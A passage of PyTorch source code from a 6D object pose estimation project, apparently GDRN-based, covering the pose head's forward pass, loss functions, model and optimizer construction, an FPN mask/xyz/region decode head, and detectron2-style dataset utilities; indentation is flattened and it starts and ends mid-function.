assert roi_classes is not None
mask = mask.view(bs, num_classes, self.mask_out_dim, out_res, out_res)
mask = mask[torch.arange(bs).to(device), roi_classes]
# -----------------------------------------------
# get rot and trans from pnp_net
# NOTE: use softmax for bins (the last dim is bg)
if coor_x.shape[1] > 1 and coor_y.shape[1] > 1 and coor_z.shape[1] > 1:
coor_x_softmax = F.softmax(coor_x[:, :-1, :, :], dim=1)
coor_y_softmax = F.softmax(coor_y[:, :-1, :, :], dim=1)
coor_z_softmax = F.softmax(coor_z[:, :-1, :, :], dim=1)
coor_feat = torch.cat([coor_x_softmax, coor_y_softmax, coor_z_softmax], dim=1)
else:
coor_feat = torch.cat([coor_x, coor_y, coor_z], dim=1) # BCHW
if pnp_net_cfg.WITH_2D_COORD:
assert roi_coord_2d is not None
coor_feat = torch.cat([coor_feat, roi_coord_2d], dim=1)
mask_atten = None
if pnp_net_cfg.MASK_ATTENTION != "none":
mask_atten = get_mask_prob(mask, mask_loss_type=net_cfg.LOSS_CFG.MASK_LOSS_TYPE)
pred_rot_, pred_t_ = self.pnp_net(coor_feat, extents=roi_extents, attention=mask_atten)
# convert pred_rot to rot mat -------------------------
rot_type = pnp_net_cfg.ROT_TYPE
pred_rot_m = get_rot_mat(pred_rot_, rot_type)
# convert pred_rot_m and pred_t to ego pose -----------------------------
if pnp_net_cfg.TRANS_TYPE == "centroid_z":
pred_ego_rot, pred_trans = pose_from_pred_centroid_z(
pred_rot_m,
pred_centroids=pred_t_[:, :2],
pred_z_vals=pred_t_[:, 2:3], # must be [B, 1]
roi_cams=roi_cams,
roi_centers=roi_centers,
resize_ratios=resize_ratios,
roi_whs=roi_whs,
eps=1e-4,
is_allo="allo" in pnp_net_cfg.ROT_TYPE,
z_type=pnp_net_cfg.Z_TYPE,
# is_train=True
is_train=do_loss, # TODO: sometimes we need it to be differentiable during test
)
elif pnp_net_cfg.TRANS_TYPE == "centroid_z_abs":
# abs 2d obj center and abs z
pred_ego_rot, pred_trans = pose_from_pred_centroid_z_abs(
pred_rot_m,
pred_centroids=pred_t_[:, :2],
pred_z_vals=pred_t_[:, 2:3], # must be [B, 1]
roi_cams=roi_cams,
eps=1e-4,
is_allo="allo" in pnp_net_cfg.ROT_TYPE,
# is_train=True
is_train=do_loss, # TODO: sometimes we need it to be differentiable during test
)
elif pnp_net_cfg.TRANS_TYPE == "trans":
pred_ego_rot, pred_trans = pose_from_pred(
pred_rot_m, pred_t_, eps=1e-4, is_allo="allo" in pnp_net_cfg.ROT_TYPE, is_train=do_loss
)
else:
raise ValueError(f"Unknown trans type: {pnp_net_cfg.TRANS_TYPE}")
if not do_loss: # test
out_dict = {"rot": pred_ego_rot, "trans": pred_trans}
if cfg.TEST.USE_PNP:
# TODO: move the pnp/ransac inside forward
out_dict.update({"mask": mask, "coor_x": coor_x, "coor_y": coor_y, "coor_z": coor_z, "region": region})
else:
out_dict = {}
assert (
(gt_xyz is not None)
and (gt_trans is not None)
and (gt_trans_ratio is not None)
and (gt_region is not None)
)
mean_re, mean_te = compute_mean_re_te(pred_trans, pred_rot_m, gt_trans, gt_ego_rot)
vis_dict = {
"vis/error_R": mean_re,
"vis/error_t": mean_te * 100, # cm
"vis/error_tx": np.abs(pred_trans[0, 0].detach().item() - gt_trans[0, 0].detach().item()) * 100, # cm
"vis/error_ty": np.abs(pred_trans[0, 1].detach().item() - gt_trans[0, 1].detach().item()) * 100, # cm
"vis/error_tz": np.abs(pred_trans[0, 2].detach().item() - gt_trans[0, 2].detach().item()) * 100, # cm
"vis/tx_pred": pred_trans[0, 0].detach().item(),
"vis/ty_pred": pred_trans[0, 1].detach().item(),
"vis/tz_pred": pred_trans[0, 2].detach().item(),
"vis/tx_net": pred_t_[0, 0].detach().item(),
"vis/ty_net": pred_t_[0, 1].detach().item(),
"vis/tz_net": pred_t_[0, 2].detach().item(),
"vis/tx_gt": gt_trans[0, 0].detach().item(),
"vis/ty_gt": gt_trans[0, 1].detach().item(),
"vis/tz_gt": gt_trans[0, 2].detach().item(),
"vis/tx_rel_gt": gt_trans_ratio[0, 0].detach().item(),
"vis/ty_rel_gt": gt_trans_ratio[0, 1].detach().item(),
"vis/tz_rel_gt": gt_trans_ratio[0, 2].detach().item(),
}
loss_dict = self.gdrn_loss(
cfg=self.cfg,
out_mask=mask,
gt_mask_trunc=gt_mask_trunc,
gt_mask_visib=gt_mask_visib,
gt_mask_obj=gt_mask_obj,
out_x=coor_x,
out_y=coor_y,
out_z=coor_z,
gt_xyz=gt_xyz,
gt_xyz_bin=gt_xyz_bin,
out_trans=pred_trans,
gt_trans=gt_trans,
out_rot=pred_ego_rot,
gt_rot=gt_ego_rot,
out_centroid=pred_t_[:, :2], # TODO: get these from trans head
out_trans_z=pred_t_[:, 2],
gt_trans_ratio=gt_trans_ratio,
gt_points=gt_points,
sym_infos=sym_infos,
extents=roi_extents,
# roi_classes=roi_classes,
)
if net_cfg.USE_MTL:
for _name in self.loss_names:
if f"loss_{_name}" in loss_dict:
vis_dict[f"vis_lw/{_name}"] = torch.exp(-getattr(self, f"log_var_{_name}")).detach().item()
for _k, _v in vis_dict.items():
if "vis/" in _k or "vis_lw/" in _k:
if isinstance(_v, torch.Tensor):
_v = _v.item()
vis_dict[_k] = _v
storage = get_event_storage()
storage.put_scalars(**vis_dict)
return out_dict, loss_dict
return out_dict
def gdrn_loss(
self,
cfg,
out_mask,
gt_mask_trunc,
gt_mask_visib,
gt_mask_obj,
out_x,
out_y,
out_z,
gt_xyz,
gt_xyz_bin,
out_rot=None,
gt_rot=None,
out_trans=None,
gt_trans=None,
out_centroid=None,
out_trans_z=None,
gt_trans_ratio=None,
gt_points=None,
sym_infos=None,
extents=None,
):
net_cfg = cfg.MODEL.POSE_NET
g_head_cfg = net_cfg.GEO_HEAD
pnp_net_cfg = net_cfg.PNP_NET
loss_cfg = net_cfg.LOSS_CFG
loss_dict = {}
gt_masks = {"trunc": gt_mask_trunc, "visib": gt_mask_visib, "obj": gt_mask_obj}
# xyz loss ----------------------------------
if not g_head_cfg.FREEZE:
xyz_loss_type = loss_cfg.XYZ_LOSS_TYPE
gt_mask_xyz = gt_masks[loss_cfg.XYZ_LOSS_MASK_GT]
if xyz_loss_type == "L1":
loss_func = nn.L1Loss(reduction="sum")
loss_dict["loss_coor_x"] = loss_func(
out_x * gt_mask_xyz[:, None], gt_xyz[:, 0:1] * gt_mask_xyz[:, None]
) / gt_mask_xyz.sum().float().clamp(min=1.0)
loss_dict["loss_coor_y"] = loss_func(
out_y * gt_mask_xyz[:, None], gt_xyz[:, 1:2] * gt_mask_xyz[:, None]
) / gt_mask_xyz.sum().float().clamp(min=1.0)
loss_dict["loss_coor_z"] = loss_func(
out_z * gt_mask_xyz[:, None], gt_xyz[:, 2:3] * gt_mask_xyz[:, None]
) / gt_mask_xyz.sum().float().clamp(min=1.0)
elif xyz_loss_type == "CE_coor":
gt_xyz_bin = gt_xyz_bin.long()
loss_func = CrossEntropyHeatmapLoss(reduction="sum", weight=None) # g_head_cfg.XYZ_BIN+1
loss_dict["loss_coor_x"] = loss_func(
out_x * gt_mask_xyz[:, None], gt_xyz_bin[:, 0] * gt_mask_xyz.long()
) / gt_mask_xyz.sum().float().clamp(min=1.0)
loss_dict["loss_coor_y"] = loss_func(
out_y * gt_mask_xyz[:, None], gt_xyz_bin[:, 1] * gt_mask_xyz.long()
) / gt_mask_xyz.sum().float().clamp(min=1.0)
loss_dict["loss_coor_z"] = loss_func(
out_z * gt_mask_xyz[:, None], gt_xyz_bin[:, 2] * gt_mask_xyz.long()
) / gt_mask_xyz.sum().float().clamp(min=1.0)
else:
raise NotImplementedError(f"unknown xyz loss type: {xyz_loss_type}")
loss_dict["loss_coor_x"] *= loss_cfg.XYZ_LW
loss_dict["loss_coor_y"] *= loss_cfg.XYZ_LW
loss_dict["loss_coor_z"] *= loss_cfg.XYZ_LW
# mask loss ----------------------------------
if not g_head_cfg.FREEZE:
mask_loss_type = loss_cfg.MASK_LOSS_TYPE
gt_mask = gt_masks[loss_cfg.MASK_LOSS_GT]
if mask_loss_type == "L1":
loss_dict["loss_mask"] = nn.L1Loss(reduction="mean")(out_mask[:, 0, :, :], gt_mask)
elif mask_loss_type == "BCE":
loss_dict["loss_mask"] = nn.BCEWithLogitsLoss(reduction="mean")(out_mask[:, 0, :, :], gt_mask)
elif mask_loss_type == "CE":
loss_dict["loss_mask"] = nn.CrossEntropyLoss(reduction="mean")(out_mask, gt_mask.long())
else:
raise NotImplementedError(f"unknown mask loss type: {mask_loss_type}")
loss_dict["loss_mask"] *= loss_cfg.MASK_LW
# point matching loss ---------------
if loss_cfg.PM_LW > 0:
assert (gt_points is not None) and (gt_trans is not None) and (gt_rot is not None)
loss_func = PyPMLoss(
loss_type=loss_cfg.PM_LOSS_TYPE,
beta=loss_cfg.PM_SMOOTH_L1_BETA,
reduction="mean",
loss_weight=loss_cfg.PM_LW,
norm_by_extent=loss_cfg.PM_NORM_BY_EXTENT,
symmetric=loss_cfg.PM_LOSS_SYM,
disentangle_t=loss_cfg.PM_DISENTANGLE_T,
disentangle_z=loss_cfg.PM_DISENTANGLE_Z,
t_loss_use_points=loss_cfg.PM_T_USE_POINTS,
r_only=loss_cfg.PM_R_ONLY,
)
loss_pm_dict = loss_func(
pred_rots=out_rot,
gt_rots=gt_rot,
points=gt_points,
pred_transes=out_trans,
gt_transes=gt_trans,
extents=extents,
sym_infos=sym_infos,
)
loss_dict.update(loss_pm_dict)
# rot_loss ----------
if loss_cfg.ROT_LW > 0:
if loss_cfg.ROT_LOSS_TYPE == "angular":
loss_dict["loss_rot"] = angular_distance(out_rot, gt_rot)
elif loss_cfg.ROT_LOSS_TYPE == "L2":
loss_dict["loss_rot"] = rot_l2_loss(out_rot, gt_rot)
else:
raise ValueError(f"Unknown rot loss type: {loss_cfg.ROT_LOSS_TYPE}")
loss_dict["loss_rot"] *= loss_cfg.ROT_LW
# centroid loss -------------
if loss_cfg.CENTROID_LW > 0:
assert (
pnp_net_cfg.TRANS_TYPE == "centroid_z"
), "centroid loss is only valid for predicting centroid2d_rel_delta"
if loss_cfg.CENTROID_LOSS_TYPE == "L1":
loss_dict["loss_centroid"] = nn.L1Loss(reduction="mean")(out_centroid, gt_trans_ratio[:, :2])
elif loss_cfg.CENTROID_LOSS_TYPE == "L2":
loss_dict["loss_centroid"] = L2Loss(reduction="mean")(out_centroid, gt_trans_ratio[:, :2])
elif loss_cfg.CENTROID_LOSS_TYPE == "MSE":
loss_dict["loss_centroid"] = nn.MSELoss(reduction="mean")(out_centroid, gt_trans_ratio[:, :2])
else:
raise ValueError(f"Unknown centroid loss type: {loss_cfg.CENTROID_LOSS_TYPE}")
loss_dict["loss_centroid"] *= loss_cfg.CENTROID_LW
# z loss ------------------
if loss_cfg.Z_LW > 0:
z_type = pnp_net_cfg.Z_TYPE
if z_type == "REL":
gt_z = gt_trans_ratio[:, 2]
elif z_type == "ABS":
gt_z = gt_trans[:, 2]
else:
raise NotImplementedError
z_loss_type = loss_cfg.Z_LOSS_TYPE
if z_loss_type == "L1":
loss_dict["loss_z"] = nn.L1Loss(reduction="mean")(out_trans_z, gt_z)
elif z_loss_type == "L2":
loss_dict["loss_z"] = L2Loss(reduction="mean")(out_trans_z, gt_z)
elif z_loss_type == "MSE":
loss_dict["loss_z"] = nn.MSELoss(reduction="mean")(out_trans_z, gt_z)
else:
raise ValueError(f"Unknown z loss type: {z_loss_type}")
loss_dict["loss_z"] *= loss_cfg.Z_LW
# trans loss ------------------
if loss_cfg.TRANS_LW > 0:
if loss_cfg.TRANS_LOSS_DISENTANGLE:
# NOTE: disentangle xy/z
if loss_cfg.TRANS_LOSS_TYPE == "L1":
loss_dict["loss_trans_xy"] = nn.L1Loss(reduction="mean")(out_trans[:, :2], gt_trans[:, :2])
loss_dict["loss_trans_z"] = nn.L1Loss(reduction="mean")(out_trans[:, 2], gt_trans[:, 2])
elif loss_cfg.TRANS_LOSS_TYPE == "L2":
loss_dict["loss_trans_xy"] = L2Loss(reduction="mean")(out_trans[:, :2], gt_trans[:, :2])
loss_dict["loss_trans_z"] = L2Loss(reduction="mean")(out_trans[:, 2], gt_trans[:, 2])
elif loss_cfg.TRANS_LOSS_TYPE == "MSE":
loss_dict["loss_trans_xy"] = nn.MSELoss(reduction="mean")(out_trans[:, :2], gt_trans[:, :2])
loss_dict["loss_trans_z"] = nn.MSELoss(reduction="mean")(out_trans[:, 2], gt_trans[:, 2])
else:
raise ValueError(f"Unknown trans loss type: {loss_cfg.TRANS_LOSS_TYPE}")
loss_dict["loss_trans_xy"] *= loss_cfg.TRANS_LW
loss_dict["loss_trans_z"] *= loss_cfg.TRANS_LW
else:
if loss_cfg.TRANS_LOSS_TYPE == "L1":
loss_dict["loss_trans_LPnP"] = nn.L1Loss(reduction="mean")(out_trans, gt_trans)
elif loss_cfg.TRANS_LOSS_TYPE == "L2":
loss_dict["loss_trans_LPnP"] = L2Loss(reduction="mean")(out_trans, gt_trans)
elif loss_cfg.TRANS_LOSS_TYPE == "MSE":
loss_dict["loss_trans_LPnP"] = nn.MSELoss(reduction="mean")(out_trans, gt_trans)
else:
raise ValueError(f"Unknown trans loss type: {loss_cfg.TRANS_LOSS_TYPE}")
loss_dict["loss_trans_LPnP"] *= loss_cfg.TRANS_LW
# bind loss (R^T@t)
if loss_cfg.get("BIND_LW", 0.0) > 0.0:
pred_bind = torch.bmm(out_rot.permute(0, 2, 1), out_trans.view(-1, 3, 1)).view(-1, 3)
gt_bind = torch.bmm(gt_rot.permute(0, 2, 1), gt_trans.view(-1, 3, 1)).view(-1, 3)
if loss_cfg.BIND_LOSS_TYPE == "L1":
loss_dict["loss_bind"] = nn.L1Loss(reduction="mean")(pred_bind, gt_bind)
elif loss_cfg.BIND_LOSS_TYPE == "L2":
loss_dict["loss_bind"] = L2Loss(reduction="mean")(pred_bind, gt_bind)
elif loss_cfg.CENTROID_LOSS_TYPE == "MSE":
loss_dict["loss_bind"] = nn.MSELoss(reduction="mean")(pred_bind, gt_bind)
else:
raise ValueError(f"Unknown bind loss (R^T@t) type: {loss_cfg.BIND_LOSS_TYPE}")
loss_dict["loss_bind"] *= loss_cfg.BIND_LW
if net_cfg.USE_MTL:
for _k in loss_dict:
_name = _k.replace("loss_", "log_var_")
cur_log_var = getattr(self, _name)
loss_dict[_k] = loss_dict[_k] * torch.exp(-cur_log_var) + torch.log(1 + torch.exp(cur_log_var))
return loss_dict
def build_model_optimizer(cfg, is_test=False):
net_cfg = cfg.MODEL.POSE_NET
backbone_cfg = net_cfg.BACKBONE
params_lr_list = []
# backbone
backbone_type = backbone_cfg.INIT_CFG.pop("type")
init_backbone_args = copy.deepcopy(backbone_cfg.INIT_CFG)
if "timm/" in backbone_type or "tv/" in backbone_type:
init_backbone_args["model_name"] = backbone_type.split("/")[-1]
backbone = BACKBONES[backbone_type](**init_backbone_args)
if backbone_cfg.FREEZE:
for param in backbone.parameters():
with torch.no_grad():
param.requires_grad = False
else:
params_lr_list.append(
{
"params": filter(lambda p: p.requires_grad, backbone.parameters()),
"lr": float(cfg.SOLVER.BASE_LR),
}
)
# neck --------------------------------
neck, neck_params = get_neck(cfg)
params_lr_list.extend(neck_params)
# geo head -----------------------------------------------------
geo_head, geo_head_params = get_geo_head(cfg)
params_lr_list.extend(geo_head_params)
# pnp net -----------------------------------------------
pnp_net, pnp_net_params = get_pnp_net_no_region(cfg)
params_lr_list.extend(pnp_net_params)
# build model
model = GDRN_NoRegion(cfg, backbone, neck=neck, geo_head_net=geo_head, pnp_net=pnp_net)
if net_cfg.USE_MTL:
params_lr_list.append(
{
"params": filter(
lambda p: p.requires_grad,
[_param for _name, _param in model.named_parameters() if "log_var" in _name],
),
"lr": float(cfg.SOLVER.BASE_LR),
}
)
# get optimizer
if is_test:
optimizer = None
else:
optimizer = build_optimizer_with_params(cfg, params_lr_list)
if cfg.MODEL.WEIGHTS == "":
## backbone initialization
backbone_pretrained = backbone_cfg.get("PRETRAINED", "")
if backbone_pretrained == "":
logger.warning("Randomly initialize weights for backbone!")
elif backbone_pretrained in ["timm", "internal"]:
# skip if it has already been initialized by pretrained=True
logger.info("Check if the backbone has been initialized with its own method!")
else:
# initialize backbone with official weights
tic = time.time()
logger.info(f"load backbone weights from: {backbone_pretrained}")
load_checkpoint(model.backbone, backbone_pretrained, strict=False, logger=logger)
logger.info(f"load backbone weights took: {time.time() - tic}s")
model.to(torch.device(cfg.MODEL.DEVICE))
return model, optimizer
```
#### File: models/heads/fpn_mask_xyz_region_head.py
```python
from abc import ABCMeta
import numpy as np
import torch
import torch.nn as nn
from torch.nn.modules.batchnorm import _BatchNorm
from mmcv.cnn import normal_init, constant_init
from core.gdrn_selfocc_modeling.tools.layers.layer_utils import resize
from core.gdrn_selfocc_modeling.tools.layers.conv_module import ConvModule
class BaseDecodeHead(nn.Module, metaclass=ABCMeta):
"""Base class for BaseDecodeHead.
Args:
in_channels (int|Sequence[int]): Input channels.
channels (int): Channels after modules, before conv_seg.
num_classes (int): Number of classes.
dropout_ratio (float): Ratio of dropout layer. Default: 0.1.
conv_cfg (dict|None): Config of conv layers. Default: None.
in_index (int|Sequence[int]): Input feature index. Default: -1
input_transform (str|None): Transformation type of input features.
Options: 'resize_concat', 'multiple_select', None.
'resize_concat': Multiple feature maps will be resize to the
same size as first one and than concat together.
Usually used in FCN head of HRNet.
'multiple_select': Multiple feature maps will be bundle into
a list and passed into decode head.
None: Only one select feature map is allowed.
Default: None.
ignore_index (int | None): The label index to be ignored. When using
masked BCE loss, ignore_index should be set to None. Default: 255
sampler (dict|None): The config of segmentation map sampler.
Default: None.
align_corners (bool): align_corners argument of F.interpolate.
Default: False.
"""
def __init__(
self,
in_channels,
channels,
*,
dropout_ratio=0.1,
conv_cfg=None,
norm=None,
act="relu",
in_index=-1,
input_transform=None,
align_corners=False,
):
super(BaseDecodeHead, self).__init__()
self._init_inputs(in_channels, in_index, input_transform)
self.channels = channels
self.dropout_ratio = dropout_ratio
self.conv_cfg = conv_cfg
self.norm = norm
self.act = act
self.in_index = in_index
self.align_corners = align_corners
if dropout_ratio > 0:
self.dropout = nn.Dropout2d(dropout_ratio)
else:
self.dropout = None
self.fp16_enabled = False
def extra_repr(self):
"""Extra repr."""
s = f"input_transform={self.input_transform}, " f"align_corners={self.align_corners}"
return s
def _init_inputs(self, in_channels, in_index, input_transform):
"""Check and initialize input transforms.
The in_channels, in_index and input_transform must match.
Specifically, when input_transform is None, only single feature map
will be selected. So in_channels and in_index must be of type int.
When input_transform
Args:
in_channels (int|Sequence[int]): Input channels.
in_index (int|Sequence[int]): Input feature index.
input_transform (str|None): Transformation type of input features.
Options: 'resize_concat', 'multiple_select', None.
'resize_concat': Multiple feature maps will be resize to the
same size as first one and than concat together.
Usually used in FCN head of HRNet.
'multiple_select': Multiple feature maps will be bundle into
a list and passed into decode head.
None: Only one select feature map is allowed.
"""
if input_transform is not None:
assert input_transform in ["resize_concat", "multiple_select"]
self.input_transform = input_transform
self.in_index = in_index
if input_transform is not None:
assert isinstance(in_channels, (list, tuple))
assert isinstance(in_index, (list, tuple))
assert len(in_channels) == len(in_index)
if input_transform == "resize_concat":
self.in_channels = sum(in_channels)
else:
self.in_channels = in_channels
else:
assert isinstance(in_channels, int)
assert isinstance(in_index, int)
self.in_channels = in_channels
def _transform_inputs(self, inputs):
"""Transform inputs for decoder.
Args:
inputs (list[Tensor]): List of multi-level img features.
Returns:
Tensor: The transformed inputs
"""
if self.input_transform == "resize_concat":
inputs = [inputs[i] for i in self.in_index]
upsampled_inputs = [
resize(input=x, size=inputs[0].shape[2:], mode="bilinear", align_corners=self.align_corners)
for x in inputs
]
inputs = torch.cat(upsampled_inputs, dim=1)
elif self.input_transform == "multiple_select":
inputs = [inputs[i] for i in self.in_index]
else:
inputs = inputs[self.in_index]
return inputs
class FPNMaskXyzRegionHead(BaseDecodeHead):
"""Panoptic Feature Pyramid Networks. This head is the implementation of
`Semantic FPN.
<https://arxiv.org/abs/1901.02446>`_.
Args:
feature_strides (tuple[int]): The strides for input feature maps.
stack_lateral. All strides suppose to be power of 2. The first
one is of largest resolution.
"""
def __init__(
self,
feature_strides,
out_kernel_size=1,
out_layer_shared=True,
mask_num_classes=1,
xyz_num_classes=1,
region_num_classes=1,
mask_out_dim=1,
xyz_out_dim=3,
region_out_dim=65, # 64+1,
**kwargs,
):
super().__init__(input_transform="multiple_select", **kwargs)
assert len(feature_strides) == len(self.in_channels)
assert min(feature_strides) == feature_strides[0]
self.feature_strides = feature_strides
self.scale_heads = nn.ModuleList()
for i in range(len(feature_strides)):
head_length = max(1, int(np.log2(feature_strides[i]) - np.log2(feature_strides[0])))
scale_head = []
for k in range(head_length):
scale_head.append(
ConvModule(
self.in_channels[i] if k == 0 else self.channels,
self.channels,
3,
padding=1,
conv_cfg=self.conv_cfg,
norm=self.norm,
act=self.act,
)
)
if feature_strides[i] != feature_strides[0]:
scale_head.append(nn.Upsample(scale_factor=2, mode="bilinear", align_corners=self.align_corners))
self.scale_heads.append(nn.Sequential(*scale_head))
self.out_layer_shared = out_layer_shared
self.mask_num_classes = mask_num_classes
self.xyz_num_classes = xyz_num_classes
self.region_num_classes = region_num_classes
self.mask_out_dim = mask_out_dim
self.xyz_out_dim = xyz_out_dim
self.region_out_dim = region_out_dim
_in_dim = self.channels
if self.out_layer_shared:
out_dim = (
self.mask_out_dim * self.mask_num_classes
+ self.xyz_out_dim * self.xyz_num_classes
+ self.region_out_dim * self.region_num_classes
)
self.out_layer = nn.Conv2d(
_in_dim,
out_dim,
kernel_size=out_kernel_size,
padding=(out_kernel_size - 1) // 2,
bias=True,
)
else:
self.mask_out_layer = nn.Conv2d(
_in_dim,
self.mask_out_dim * self.mask_num_classes,
kernel_size=out_kernel_size,
padding=(out_kernel_size - 1) // 2,
bias=True,
)
self.xyz_out_layer = nn.Conv2d(
_in_dim,
self.xyz_out_dim * self.xyz_num_classes,
kernel_size=out_kernel_size,
padding=(out_kernel_size - 1) // 2,
bias=True,
)
self.region_out_layer = nn.Conv2d(
_in_dim,
self.region_out_dim * self.region_num_classes,
kernel_size=out_kernel_size,
padding=(out_kernel_size - 1) // 2,
bias=True,
)
# init
for m in self.modules():
if isinstance(m, nn.Conv2d):
normal_init(m, std=0.001)
elif isinstance(m, (_BatchNorm, nn.GroupNorm)):
constant_init(m, 1)
elif isinstance(m, nn.ConvTranspose2d):
normal_init(m, std=0.001)
# init output layers
if self.out_layer_shared:
normal_init(self.out_layer, std=0.01)
else:
normal_init(self.mask_out_layer, std=0.01)
normal_init(self.xyz_out_layer, std=0.01)
normal_init(self.region_out_layer, std=0.01)
def forward(self, inputs):
x = self._transform_inputs(inputs) # strides: [4, 8, 16, 32]
output = self.scale_heads[0](x[0])
for i in range(1, len(self.feature_strides)):
# non inplace
output = output + resize(
self.scale_heads[i](x[i]), size=output.shape[2:], mode="bilinear", align_corners=self.align_corners
)
output = self.get_output(output)
return output
def get_output(self, x):
if self.dropout is not None:
x = self.dropout(x)
if self.out_layer_shared:
out = self.out_layer(x)
mask_dim = self.mask_out_dim * self.mask_num_classes
mask = out[:, :mask_dim, :, :]
xyz_dim = self.xyz_out_dim * self.xyz_num_classes
xyz = out[:, mask_dim : mask_dim + xyz_dim, :, :]
region = out[:, mask_dim + xyz_dim :, :, :]
bs, c, h, w = xyz.shape
xyz = xyz.view(bs, 3, xyz_dim // 3, h, w)
coor_x = xyz[:, 0, :, :, :]
coor_y = xyz[:, 1, :, :, :]
coor_z = xyz[:, 2, :, :, :]
else:
mask = self.mask_out_layer(x)
xyz = self.xyz_out_layer(x)
bs, c, h, w = xyz.shape
xyz = xyz.view(bs, 3, c // 3, h, w)
coor_x = xyz[:, 0, :, :, :]
coor_y = xyz[:, 1, :, :, :]
coor_z = xyz[:, 2, :, :, :]
region = self.region_out_layer(x)
return mask, coor_x, coor_y, coor_z, region
```
#### File: gdrn_selfocc_modeling/tools/dataset_utils.py
```python
import copy
import logging
import numpy as np
import operator
import pickle
import random
import mmcv
import torch
import torch.multiprocessing as mp
import torch.utils.data as data
from torch.utils.data import dataloader
from detectron2.utils.serialize import PicklableWrapper
from detectron2.data.build import worker_init_reset_seed, get_detection_dataset_dicts
from detectron2.data.common import AspectRatioGroupedDataset, DatasetFromList, MapDataset
from detectron2.data.dataset_mapper import DatasetMapper
from detectron2.data.samplers import InferenceSampler, RepeatFactorTrainingSampler, TrainingSampler
from detectron2.data import DatasetCatalog, MetadataCatalog
from detectron2.structures import BoxMode
import ref
from . import my_comm as comm
logger = logging.getLogger(__name__)
def flat_dataset_dicts(dataset_dicts):
"""
flatten the dataset dicts of detectron2 format
original: list of dicts, each dict contains some image-level infos
and an "annotations" field for instance-level infos of multiple instances
=> flat the instance level annotations
flat format:
list of dicts,
each dict includes the image/instance-level infos
an `inst_id` of a single instance,
`inst_infos` includes only one instance
"""
new_dicts = []
for dataset_dict in dataset_dicts:
img_infos = {_k: _v for _k, _v in dataset_dict.items() if _k not in ["annotations"]}
if "annotations" in dataset_dict:
for inst_id, anno in enumerate(dataset_dict["annotations"]):
rec = {"inst_id": inst_id, "inst_infos": anno}
rec.update(img_infos)
new_dicts.append(rec)
else:
rec = img_infos
new_dicts.append(rec)
return new_dicts
def filter_invalid_in_dataset_dicts(dataset_dicts, visib_thr=0.0):
"""
filter invalid instances in the dataset_dicts (for train)
Args:
visib_thr:
"""
num_filtered = 0
new_dicts = []
for dataset_dict in dataset_dicts:
new_dict = {_k: _v for _k, _v in dataset_dict.items() if _k not in ["annotations"]}
if "annotations" in dataset_dict:
new_annos = []
for inst_id, anno in enumerate(dataset_dict["annotations"]):
if anno.get("visib_fract", 1.0) > visib_thr:
new_annos.append(anno)
else:
num_filtered += 1
if len(new_annos) == 0:
continue
new_dict["annotations"] = new_annos
new_dicts.append(new_dict)
if num_filtered > 0:
logger.warning(f"filtered out {num_filtered} instances with visib_fract <= {visib_thr}")
return new_dicts
def trivial_batch_collator(batch):
"""A batch collator that does nothing.
https://github.com/pytorch/fairseq/issues/1171
"""
dataloader._use_shared_memory = False
return batch
def filter_empty_dets(dataset_dicts):
"""
Filter out images with empty detections
NOTE: here we assume detections are in "annotations"
Args:
dataset_dicts (list[dict]): annotations in Detectron2 Dataset format.
Returns:
list[dict]: the same format, but filtered.
"""
num_before = len(dataset_dicts)
def valid(anns):
if len(anns) > 0:
return True
# for ann in anns:
# if ann.get("iscrowd", 0) == 0:
# return True
return False
dataset_dicts = [x for x in dataset_dicts if valid(x["annotations"])]
num_after = len(dataset_dicts)
if num_after < num_before:
logger = logging.getLogger(__name__)
logger.warning(
"Removed {} images with empty detections. {} images left.".format(num_before - num_after, num_after)
)
return dataset_dicts
def load_detections_into_dataset(
dataset_name,
dataset_dicts,
det_file,
top_k_per_obj=1,
score_thr=0.0,
train_objs=None,
top_k_per_im=None,
):
"""Load test detections into the dataset.
Args:
dataset_name (str):
dataset_dicts (list[dict]): annotations in Detectron2 Dataset format.
det_file (str): file path of pre-computed detections, in json format.
Returns:
list[dict]: the same format as dataset_dicts, but added proposal field.
"""
logger.info("Loading detections for {} from: {}".format(dataset_name, det_file))
detections = mmcv.load(det_file)
meta = MetadataCatalog.get(dataset_name)
objs = meta.objs
ref_key = meta.ref_key
data_ref = ref.__dict__[ref_key]
models_info = data_ref.get_models_info()
if "annotations" in dataset_dicts[0]:
logger.warning("pop the original annotations, load detections")
new_dataset_dicts = []
for i, record_ori in enumerate(dataset_dicts):
record = copy.deepcopy(record_ori)
scene_im_id = record["scene_im_id"]
if scene_im_id not in detections: # not detected
logger.warning(f"no detections found in {scene_im_id}")
continue
dets_i = detections[scene_im_id]
annotations = []
obj_annotations = {obj: [] for obj in objs}
for det in dets_i:
obj_id = det["obj_id"]
bbox_est = det["bbox_est"] # xywh
time = det.get("time", 0.0)
score = det.get("score", 1.0)
if score < score_thr:
continue
obj_name = data_ref.id2obj[obj_id]
if obj_name not in objs: # detected obj is not interested
continue
if train_objs is not None: # not in trained objects
if obj_name not in train_objs:
continue
label = objs.index(obj_name)
inst = {
"category_id": label,
"bbox_est": bbox_est,
"bbox_mode": BoxMode.XYWH_ABS,
"score": score,
"time": time,
"model_info": models_info[str(obj_id)], # TODO: maybe just load this in the main function
}
obj_annotations[obj_name].append(inst)
for obj, cur_annos in obj_annotations.items():
scores = [ann["score"] for ann in cur_annos]
sel_annos = [ann for _, ann in sorted(zip(scores, cur_annos), key=lambda pair: pair[0], reverse=True)][
:top_k_per_obj
]
annotations.extend(sel_annos)
# NOTE: maybe [], no detections
record["annotations"] = annotations
new_dataset_dicts.append(record)
if len(new_dataset_dicts) < len(dataset_dicts):
logger.warning(
"No detections found in {} images. original: {} imgs, left: {} imgs".format(
len(dataset_dicts) - len(new_dataset_dicts), len(dataset_dicts), len(new_dataset_dicts)
)
)
return new_dataset_dicts
def load_init_poses_into_dataset(
dataset_name,
dataset_dicts,
init_pose_file,
top_k_per_obj=1,
score_thr=0.0,
train_objs=None,
top_k_per_im=None,
):
"""Load initial poses into the dataset.
Args:
dataset_name (str):
dataset_dicts (list[dict]): annotations in Detectron2 Dataset format.
init_pose_file (str): file path of pre-computed initial poses, in json format.
Returns:
list[dict]: the same format as dataset_dicts, but added proposal field.
"""
logger.info("Loading initial poses for {} from: {}".format(dataset_name, init_pose_file))
init_det_poses = mmcv.load(init_pose_file)
meta = MetadataCatalog.get(dataset_name)
objs = meta.objs
ref_key = meta.ref_key
data_ref = ref.__dict__[ref_key]
models_info = data_ref.get_models_info()
if "annotations" in dataset_dicts[0]:
logger.warning("pop the original annotations, load initial poses")
for record in dataset_dicts:
scene_im_id = record["scene_im_id"]
dets_i = init_det_poses[scene_im_id]
annotations = []
